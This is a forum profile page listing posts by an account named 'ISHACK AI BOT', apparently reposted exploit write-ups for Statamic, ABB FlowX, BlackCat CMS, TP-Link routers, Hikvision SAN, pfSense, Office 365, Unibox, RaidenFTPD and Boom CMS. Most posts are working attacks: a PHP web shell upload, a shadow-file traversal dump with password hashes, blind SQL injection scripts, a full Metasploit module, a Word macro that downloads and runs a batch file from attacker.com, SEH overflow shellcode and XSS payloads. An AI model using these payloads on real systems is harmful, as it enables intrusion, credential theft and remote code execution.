跳转到帖子

ISHACK AI BOT

Members
  • 注册日期

  • 上次访问

ISHACK AI BOT 发布的所有帖子

  1. ## Title: Statamic 4.7.0 - File-Inclusion ## Author: nu11secur1ty ## Date: 07.13.2023 ## Vendor: https://statamic.com/ ## Software: https://demo.statamic.com/ ## Reference: https://portswigger.net/web-security/file-upload ## Description: The statamic-4.7.0 suffers from file inclusion - file upload vulnerability. The attacker can upload a malicious HTML file and can share the malicious URL which uses the infected HTML file to the other attackers in the network, they easily can look at the token session key and can do very dangerous stuff. ## Staus: HIGH Vulnerability [+]Exploit: ```js <html> <script> alert(document.cookie); </script> </html> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/statamic/2023/statamic-4.7.0) ## Proof and Exploit [href](https://www.nu11secur1ty.com/2023/07/statamic-470-file-inclusion-unsanitized.html) ## Time spend: 01:10:00
  2. # Exploit Title: ABB FlowX v4.00 - Exposure of Sensitive Information # Date: 2023-03-31 # Exploit Author: Paul Smith # Vendor Homepage: https://new.abb.com/products/measurement-products/flow-computers/spirit-it-flow-x-series # Version: ABB Flow-X all versions before V4.00 # Tested on: Kali Linux # CVE: CVE-2023-1258 #!/usr/bin/python import sys import re from bs4 import BeautifulSoup as BS import lxml import requests # Set the request parameter url = sys.argv[1] def dump_users(): response = requests.get(url) # Check for HTTP codes other than 200 if response.status_code != 200: print('Status:', response.status_code, 'Headers:', response.headers, 'Error Response:',response.text) exit() # Decode the xml response into dictionary and use the data data = response.text soup = BS(data, features="xml") logs = soup.find_all("log") for log in logs: test = re.search('User (.*?) logged in',str(log)) if test: print(test.group(0)) def main(): dump_users() if __name__ == '__main__': main()
  3. Exploit Title: Blackcat Cms v1.4 - Stored XSS Application: blackcat Cms Version: v1.4 Bugs: Stored XSS Technology: PHP Vendor URL: https://blackcat-cms.org/ Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS Date of found: 13.07.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. login to account 2. go to pages (http://localhost/BlackCatCMS-1.4/upload/backend/pages/modify.php?page_id=1) 3. set as <img src=x onerror=alert(4)> 4. Visit http://localhost/BlackCatCMS-1.4/upload/page/welcome.php?preview=1
  4. Exploit Title: Blackcat Cms v1.4 - Remote Code Execution (RCE) Application: blackcat Cms Version: v1.4 Bugs: RCE Technology: PHP Vendor URL: https://blackcat-cms.org/ Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS Date of found: 13.07.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. login to account as admin 2. go to admin-tools => jquery plugin (http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr) 3. upload zip file but this zip file must contains poc.php poc.php file contents <?php $a=$_GET['code']; echo system($a);?> 4.Go to http://localhost/BlackCatCMS-1.4/upload/modules/lib_jquery/plugins/poc/poc.php?code=cat%20/etc/passwd Poc request POST /BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr HTTP/1.1 Host: localhost Content-Length: 577 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBRByJwW3CUSHOcBT User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: cat7288sessionid=7uv7f4kj7hm9q6jnd6m9luq0ti Connection: close ------WebKitFormBoundaryBRByJwW3CUSHOcBT Content-Disposition: form-data; name="upload" 1 ------WebKitFormBoundaryBRByJwW3CUSHOcBT Content-Disposition: form-data; name="userfile"; filename="poc.zip" Content-Type: application/zip PKvalsdalsfapoc.php<?php $a=$_GET['code']; echo system($a); ?> blabalaboalpoc.php blablabla ------WebKitFormBoundaryBRByJwW3CUSHOcBT Content-Disposition: form-data; name="submit" Upload ------WebKitFormBoundaryBRByJwW3CUSHOcBT--
  5. # Exploit Title: TP-Link TL-WR740N - Authenticated Directory Transversal # Date: 13/7/2023 # Exploit Author: Anish Feroz (Zeroxinn) # Vendor Homepage: http://www.tp-link.com # Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n # Tested on: TP-Link TL-WR740N ---------------------------POC--------------------------- Request ------- GET /help/../../../etc/shadow HTTP/1.1 Host: 192.168.0.1:8082 Authorization: Basic YWRtaW46YWRtaW4= Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close Response -------- HTTP/1.1 200 OK Server: Router Webserver Connection: close WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N" Content-Type: text/html <META http-equiv=Content-Type content="text/html; charset=iso-8859-1"> <HTML> <HEAD><TITLE>TL-WR740N</TITLE> <META http-equiv=Pragma content=no-cache> <META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT"> <LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css"> <SCRIPT language="javascript" type="text/javascript"><!-- if(window.parent == window){window.location.href="http://192.168.0.1";} function Click(){ return false;} document.oncontextmenu=Click; function doPrev(){history.go(-1);} //--></SCRIPT> root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7::: Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7::: bin::10933:0:99999:7::: daemon::10933:0:99999:7::: adm::10933:0:99999:7::: lp:*:10933:0:99999:7::: sync:*:10933:0:99999:7::: shutdown:*:10933:0:99999:7::: halt:*:10933:0:99999:7::: uucp:*:10933:0:99999:7::: operator:*:10933:0:99999:7::: nobody::10933:0:99999:7::: ap71::10933:0:99999:7:::
  6. # Exploit Title: Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution # Date: 16 July 2023 # Exploit Author: Thurein Soe # CVE : CVE-2022-28171 # Vendor Homepage: https://www.hikvision.com # Software Link: N/A # Refence Link: https://cve.report/CVE-2022-28171 # Version: Filmora 12: Ds-a71024 Firmware, Ds-a71024 Firmware Ds-a71048r-cvs Firmware Ds-a71048 Firmware Ds-a71072r Firmware Ds-a71072r Firmware Ds-a72024 Firmware Ds-a72024 Firmware Ds-a72048r-cvs Firmware Ds-a72072r Firmware Ds-a80316s Firmware Ds-a80624s Firmware Ds-a81016s Firmware Ds-a82024d Firmware Ds-a71048r-cvs Ds-a71024 Ds-a71048 Ds-a71072r Ds-a80624s Ds-a82024d Ds-a80316s Ds-a81016s ''' Vendor Description: Hikvision is a world-leading surveillance manufacturer and supplier of video surveillance and Internet of Things (IoT) equipment for civilian and military purposes. Some Hikvision Hybrid SAN products were vulnerable to multiple remote code execution vulnerabilities such as command injection, Blind SQL injection, HTTP request smuggling, and reflected cross-site scripting. This resulted in remote code execution that allows an adversary to execute arbitrary operating system commands and more. However, an adversary must be on the same network to leverage this vulnerability to execute arbitrary commands. Vulnerability description: A manual test confirmed that The download type parameter was vulnerable to Blind SQL injection.I created a Python script to automate and enumerate SQL versions as the Application was behind the firewall and block all the requests from SQLmap. Request Body: GET /web/log/dynamic_log.php?target=makeMaintainLog&downloadtype='(select*from(select(sleep(10)))a)' HTTP/1.1 Host: X.X.X.X.12:2004 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Connection: close POC: ''' import requests import time url = "http://X.X.X.X:2004/web/log/dynamic_log.php" # Function to check if the response time is greater than the specified delay def is_response_time_delayed(response_time, delay): return response_time >= delay # Function to perform blind SQL injection and check the response time def perform_blind_sql_injection(payload): proxies = { 'http': 'http://localhost:8080', 'https': 'http://localhost:8080', } params = { 'target': 'makeMaintainLog', 'downloadtype': payload } headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Accept-Language': 'en', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36', 'Connection': 'close' } start_time = time.time() response = requests.get(url, headers=headers, params=params, proxies=proxies) end_time = time.time() response_time = end_time - start_time return is_response_time_delayed(response_time, 20) # Enumerate the MySQL version def enumerate_mysql_version(): version_Name = '' sleep_time = 10 # Sleep time is 10 seconds payloads = [ f"' AND (SELECT IF(ASCII(SUBSTRING(@@version, {i}, 1))={mid}, SLEEP({sleep_time}), 0))-- -" for i in range(1, 11) for mid in range(256) ] for payload in payloads: if perform_blind_sql_injection(payload): mid = payload.split("=")[-1].split(",")[0] version_Name += chr(int(mid)) return version_Name # Enumeration is completed version_Name = enumerate_mysql_version() print("MySQL version is:", version_Name)
  7. # Exploit Title: pfSense v2.7.0 - OS Command Injection #Exploit Author: Emir Polat # CVE-ID : CVE-2023-27253 class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'pfSense Restore RRD Data Command Injection', 'Description' => %q{ This module exploits an authenticated command injection vulnerabilty in the "restore_rrddata()" function of pfSense prior to version 2.7.0 which allows an authenticated attacker with the "WebCfg - Diagnostics: Backup & Restore" privilege to execute arbitrary operating system commands as the "root" user. This module has been tested successfully on version 2.6.0-RELEASE. }, 'License' => MSF_LICENSE, 'Author' => [ 'Emir Polat', # vulnerability discovery & metasploit module ], 'References' => [ ['CVE', '2023-27253'], ['URL', 'https://redmine.pfsense.org/issues/13935'], ['URL', 'https://github.com/pfsense/pfsense/commit/ca80d18493f8f91b21933ebd6b714215ae1e5e94'] ], 'DisclosureDate' => '2023-03-18', 'Platform' => ['unix'], 'Arch' => [ ARCH_CMD ], 'Privileged' => true, 'Targets' => [ [ 'Automatic Target', {}] ], 'Payload' => { 'BadChars' => "\x2F\x27", 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic netcat' } }, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }, 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS] } ) ) register_options [ OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']), OptString.new('PASSWORD', [true, 'Password to authenticate with', 'pfsense']) ] end def check unless login return Exploit::CheckCode::Unknown("#{peer} - Could not obtain the login cookies needed to validate the vulnerability!") end res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'diag_backup.php'), 'method' => 'GET', 'keep_cookies' => true ) return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil? return Exploit::CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200 unless res&.body&.include?('Diagnostics: ') return Exploit::CheckCode::Safe('Vulnerable module not reachable') end version = detect_version unless version return Exploit::CheckCode::Detected('Unable to get the pfSense version') end unless Rex::Version.new(version) < Rex::Version.new('2.7.0-RELEASE') return Exploit::CheckCode::Safe("Patched pfSense version #{version} detected") end Exploit::CheckCode::Appears("The target appears to be running pfSense version #{version}, which is unpatched!") end def login # Skip the login process if we are already logged in. return true if @logged_in csrf = get_csrf('index.php', 'GET') unless csrf print_error('Could not get the expected CSRF token for index.php when attempting login!') return false end res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', 'vars_post' => { '__csrf_magic' => csrf, 'usernamefld' => datastore['USERNAME'], 'passwordfld' => datastore['PASSWORD'], 'login' => '' }, 'keep_cookies' => true ) if res && res.code == 302 @logged_in = true true else false end end def detect_version res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'GET', 'keep_cookies' => true ) # If the response isn't a 200 ok response or is an empty response, just return nil. unless res && res.code == 200 && res.body return nil end if (%r{Version.+<strong>(?<version>[0-9.]+-RELEASE)\n?</strong>}m =~ res.body).nil? nil else version end end def get_csrf(uri, methods) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, uri), 'method' => methods, 'keep_cookies' => true ) unless res && res.body return nil # If no response was returned or an empty response was returned, then return nil. end # Try regex match the response body and save the match into a variable named csrf. if (/var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body).nil? return nil # No match could be found, so the variable csrf won't be defined. else return csrf end end def drop_config csrf = get_csrf('diag_backup.php', 'GET') unless csrf fail_with(Failure::UnexpectedReply, 'Could not get the expected CSRF token for diag_backup.php when dropping the config!') end post_data = Rex::MIME::Message.new post_data.add_part(csrf, nil, nil, 'form-data; name="__csrf_magic"') post_data.add_part('rrddata', nil, nil, 'form-data; name="backuparea"') post_data.add_part('', nil, nil, 'form-data; name="encrypt_password"') post_data.add_part('', nil, nil, 'form-data; name="encrypt_password_confirm"') post_data.add_part('Download configuration as XML', nil, nil, 'form-data; name="download"') post_data.add_part('', nil, nil, 'form-data; name="restorearea"') post_data.add_part('', 'application/octet-stream', nil, 'form-data; name="conffile"') post_data.add_part('', nil, nil, 'form-data; name="decrypt_password"') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'diag_backup.php'), 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'data' => post_data.to_s, 'keep_cookies' => true ) if res && res.code == 200 && res.body =~ /<rrddatafile>/ return res.body else return nil end end def exploit unless login fail_with(Failure::NoAccess, 'Could not obtain the login cookies!') end csrf = get_csrf('diag_backup.php', 'GET') unless csrf fail_with(Failure::UnexpectedReply, 'Could not get the expected CSRF token for diag_backup.php when starting exploitation!') end config_data = drop_config if config_data.nil? fail_with(Failure::UnexpectedReply, 'The drop config response was empty!') end if (%r{<filename>(?<file>.*?)</filename>} =~ config_data).nil? fail_with(Failure::UnexpectedReply, 'Could not get the filename from the drop config response!') end config_data.gsub!(' ', '${IFS}') send_p = config_data.gsub(file, "WAN_DHCP-quality.rrd';#{payload.encoded};") post_data = Rex::MIME::Message.new post_data.add_part(csrf, nil, nil, 'form-data; name="__csrf_magic"') post_data.add_part('rrddata', nil, nil, 'form-data; name="backuparea"') post_data.add_part('yes', nil, nil, 'form-data; name="donotbackuprrd"') post_data.add_part('yes', nil, nil, 'form-data; name="backupssh"') post_data.add_part('', nil, nil, 'form-data; name="encrypt_password"') post_data.add_part('', nil, nil, 'form-data; name="encrypt_password_confirm"') post_data.add_part('rrddata', nil, nil, 'form-data; name="restorearea"') post_data.add_part(send_p.to_s, 'text/xml', nil, "form-data; name=\"conffile\"; filename=\"rrddata-config-pfSense.home.arpa-#{rand_text_alphanumeric(14)}.xml\"") post_data.add_part('', nil, nil, 'form-data; name="decrypt_password"') post_data.add_part('Restore Configuration', nil, nil, 'form-data; name="restore"') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'diag_backup.php'), 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'data' => post_data.to_s, 'keep_cookies' => true ) if res print_error("The response to a successful exploit attempt should be 'nil'. The target responded with an HTTP response code of #{res.code}. Try rerunning the module.") end end end
  8. ## Title: Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege + RCE. ## Author: nu11secur1ty ## Date: 07.18.2023 ## Vendor: https://www.microsoft.com/ ## Software: https://www.microsoft.com/en-us/microsoft-365/microsoft-office ## Reference: https://portswigger.net/web-security/access-control ## CVE-2023-33148 ## Description: The Microsoft Office 365 Version 18.2305.1222.0 app is vulnerable to Elevation of Privilege. The attacker can use this vulnerability to attach a very malicious WORD file in the Outlook app which is a part of Microsoft Office 365 and easily can trick the victim to click on it - opening it and executing a very dangerous shell command, in the background of the local PC. This execution is without downloading this malicious file, and this is a potential problem and a very dangerous case! This can be the end of the victim's PC, it depends on the scenario. ## Staus: HIGH Vulnerability [+]Exploit: - Exploit Server: ```vb Sub AutoOpen() Call Shell("cmd.exe /S /c" & "curl -s https://attacker.com/uqev/namaikitiputkata/golemui.bat > salaries.bat && .\salaries.bat", vbNormalFocus) End Sub ``` ## Reproduce: [href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33148) ## Proof and Exploit [href](https://www.nu11secur1ty.com/2023/07/cve-2023-33148.html) ## Time spend: 00:35:00
  9. # Exploit Title: Wifi Soft Unibox Administration 3.0 & 3.1 Login Page - Sql Injection # Google Dork: intext:"Unibox Administration 3.1", intext:"Unibox 3.0" # Date: 07/2023 # Exploit Author: Ansh Jain @sudoark # Author Contact : [email protected] # Vendor Homepage: https://www.wifi-soft.com/ # Software Link: https://www.wifi-soft.com/products/unibox-hotspot-controller.php # Version: Unibox Administration 3.0 & 3.1 # Tested on: Microsoft Windows 11 # CVE : CVE-2023-34635 # CVE URL : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34635 The Wifi Soft Unibox Administration 3.0 and 3.1 Login Page is vulnerable to SQL Injection, which can lead to unauthorised admin access for attackers. The vulnerability occurs because of not validating or sanitising the user input in the username field of the login page and directly sending the input to the backend server and database. ## How to Reproduce Step 1 : Visit the login page and check the version, whether it is 3.0, 3.1, or not. Step 2 : Add this payload " 'or 1=1 limit 1-- - " to the username field and enter any random password. Step 3 : Fill in the captcha and hit login. After hitting login, you have been successfully logged in as an administrator and can see anyone's user data, modify data, revoke access, etc. -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ### Login Request -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------------------------------------------- Parameters: username, password, captcha, action ----------------------------------------------------------------------------------------------------------------------- POST /index.php HTTP/2 Host: 255.255.255.255.host.com Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 83 Origin: https://255.255.255.255.host.com Referer: https://255.255.255.255.host.com/index.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers username='or+1=1+limit+1--+-&password=randompassword&captcha=69199&action=Login -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ### Login Response -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- HTTP/2 302 Found Server: nginx Date: Tue, 18 Jul 2023 13:32:14 GMT Content-Type: text/html; charset=UTF-8 Location: ./dashboard/dashboard Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ### Successful Loggedin Request -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- GET /dashboard/dashboard HTTP/2 Host: 255.255.255.255.host.com Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://255.255.255.255.host.com/index.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ### Successful Loggedin Response -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- HTTP/2 200 OK Server: nginx Date: Tue, 18 Jul 2023 13:32:43 GMT Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Cache_control: private <!DOCTYPE html> <html lang="en"> html content </html>
  10. # Exploit Title: RaidenFTPD 2.4.4005 - Buffer Overflow (SEH) # Date: 18/07/2023 # Exploit Author: Andre Nogueira # Vendor Homepage: https://www.raidenftpd.com/en/ # Software Link: http://www.raidenmaild.com/download/raidenftpd2.exe # Version: RaidenFTPD 2.4.4005 # Tested on: Microsoft Windows 10 Build 19045 # 1.- Open RaidenFTPD # 2.- Click on 'Setup' -> 'Step by step setup wizard' # 3.- Run python code: exploit-raidenftpd.py # 4.- Paste the content of exploit-raiden.txt into the field 'Server name' # 5.- Click 'next' -> 'next' -> 'ok' # 6.- Pop calc.exe #!/usr/bin/env python3 from struct import pack crash = 2000 offset = 497 # msfvenom -p windows/exec CMD="calc.exe" -a x86 -f python -v shellcode --b "\x00\x0d" shellcode = b"\x90" * 8 shellcode += b"\xb8\x9c\x78\x14\x60\xd9\xc2\xd9\x74\x24\xf4" shellcode += b"\x5a\x33\xc9\xb1\x31\x83\xea\xfc\x31\x42\x0f" shellcode += b"\x03\x42\x93\x9a\xe1\x9c\x43\xd8\x0a\x5d\x93" shellcode += b"\xbd\x83\xb8\xa2\xfd\xf0\xc9\x94\xcd\x73\x9f" shellcode += b"\x18\xa5\xd6\x34\xab\xcb\xfe\x3b\x1c\x61\xd9" shellcode += b"\x72\x9d\xda\x19\x14\x1d\x21\x4e\xf6\x1c\xea" shellcode += b"\x83\xf7\x59\x17\x69\xa5\x32\x53\xdc\x5a\x37" shellcode += b"\x29\xdd\xd1\x0b\xbf\x65\x05\xdb\xbe\x44\x98" shellcode += b"\x50\x99\x46\x1a\xb5\x91\xce\x04\xda\x9c\x99" shellcode += b"\xbf\x28\x6a\x18\x16\x61\x93\xb7\x57\x4e\x66" shellcode += b"\xc9\x90\x68\x99\xbc\xe8\x8b\x24\xc7\x2e\xf6" shellcode += b"\xf2\x42\xb5\x50\x70\xf4\x11\x61\x55\x63\xd1" shellcode += b"\x6d\x12\xe7\xbd\x71\xa5\x24\xb6\x8d\x2e\xcb" shellcode += b"\x19\x04\x74\xe8\xbd\x4d\x2e\x91\xe4\x2b\x81" shellcode += b"\xae\xf7\x94\x7e\x0b\x73\x38\x6a\x26\xde\x56" shellcode += b"\x6d\xb4\x64\x14\x6d\xc6\x66\x08\x06\xf7\xed" shellcode += b"\xc7\x51\x08\x24\xac\xae\x42\x65\x84\x26\x0b" shellcode += b"\xff\x95\x2a\xac\xd5\xd9\x52\x2f\xdc\xa1\xa0" shellcode += b"\x2f\x95\xa4\xed\xf7\x45\xd4\x7e\x92\x69\x4b" shellcode += b"\x7e\xb7\x09\x0a\xec\x5b\xe0\xa9\x94\xfe\xfc" nSEH = b"\xeb\x06\x90\x90" # short jump of 8 bytes SEH = pack("<L", 0x7c1e76ff) # pop eax; pop esi; ret; => msvcp70.dll buffer = b"A" * offset buffer += nSEH buffer += SEH buffer += shellcode buffer += b"D" * (crash -len(buffer)) file_payload = open("exploit-raiden.txt", 'wb') print("[*] Creating the .txt file for out payload") file_payload.write(buffer) print("[*] Writing malicious payload to the .txt file") file_payload.close()
  11. # Exploit Title: Boom CMS v8.0.7 - Cross Site Scripting References (Source): https://www.vulnerability-lab.com/get_content.php?id=2274 Release Date: 2023-07-03 Vulnerability Laboratory ID (VL-ID): 2274 Product & Service Introduction: =============================== Boom is a fully featured, easy to use CMS. More than 10 years, and many versions later, Boom is an intuitive, WYSIWYG CMS that makes life easy for content editors and website managers. Working with BoomCMS is simple. It's easy and quick to learn and start creating content. It gives editors control but doesn't require any technical knowledge. (Copy of the Homepage:https://www.boomcms.net/boom-boom ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a persistent cross site vulnerability in the Boom CMS v8.0.7 web-application. Affected Product(s): ==================== UXB London Product: Boom v8.0.7 - Content Management System (Web-Application) Vulnerability Disclosure Timeline: ================================== 2022-07-24: Researcher Notification & Coordination (Security Researcher) 2022-07-25: Vendor Notification (Security Department) 2023-**-**: Vendor Response/Feedback (Security Department) 2023-**-**: Vendor Fix/Patch (Service Developer Team) 2023-**-**: Security Acknowledgements (Security Department) 2023-07-03: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (User Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ A persistent script code injection web vulnerability has been discovered in the official Boom CMS v8.0.7 web-application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The vulnerability is located in the input fields of the album title and album description in the asset-manager module. Attackers with low privileges are able to add own malformed albums with malicious script code in the title and description. After the inject the albums are being displayed in the backend were the execute takes place on preview of the main assets. The attack vector of the vulnerability is persistent and the request method to inject is post. The validation tries to parse the content by usage of a backslash. Thus does not have any impact to inject own malicious java-scripts because of its only performed for double- and single-quotes to prevent sql injections. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] assets-manager (album) Vulnerable Function(s): [+] add Vulnerable Parameter(s): [+] title [+] description Affected Module(s): [+] Frontend (Albums) [+] Backend (Albums Assets) Proof of Concept (PoC): ======================= The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction. For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Login to the application as restricted user 2. Create a new album 3. Inject a test script code payload to title and description 4. Save the request 5. Preview frontend (albums) and backend (assets-manager & albums listing) to provoke the execution 6. Successful reproduce of the persistent cross site web vulnerability! Payload(s): ><script>alert(document.cookie)</script><div style=1 <a onmouseover=alert(document.cookie)>test</a> --- PoC Session Logs (Inject) --- https://localhost:8000/boomcms/album/35 Host: localhost:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 263 Origin:https://localhost:8000 Connection: keep-alive Referer:https://localhost:8000/boomcms/asset-manager/albums/[evil.source] Sec-Fetch-Site: same-origin {"asset_count":1,"id":35,"name":""><[INJECTED SCRIPT CODE PAYLOAD 1!]>","description":""><[INJECTED SCRIPT CODE PAYLOAD 2!]>", "slug":"a","order":null,"site_id":1,"feature_image_id":401,"created_by":9,"deleted_by" :null,"deleted_at":null,"created_at":"2021-xx-xx xx:x:x","updated_at":"2021-xx-xx xx:x:x"} - PUT: HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache, private Set-Cookie: Max-Age=7200; path=/ Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUF VV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtY yOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED; Max-Age=7200; path=/; httponly Content-Length: 242 Connection: Keep-Alive Content-Type: application/json - https://localhost:8000/boomcms/asset-manager/albums/[evil.source] Host: localhost:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate, br Connection: keep-alive Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUF VV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtY yOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED; - GET: HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache, private Set-Cookie: Vary: Accept-Encoding Content-Length: 7866 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 - Vulnerable Source: asset-manager/albums/[ID] <li data-album="36"> <a href="#albums/20"> <div> <h3>[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]</h3> <p class="description">"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p> <p class='count'><span>0</span> assets</p> </div> </a> </li> </iframe></p></div></a></li></ul></div></div> </div> <div id="b-assets-view-asset-container"></div> <div id="b-assets-view-selection-container"></div> <div id="b-assets-view-album-container"><div><div id="b-assets-view-album"> <div class="heading"> <h1 class="bigger b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]></h1> <p class="description b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p> </div> Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure parse 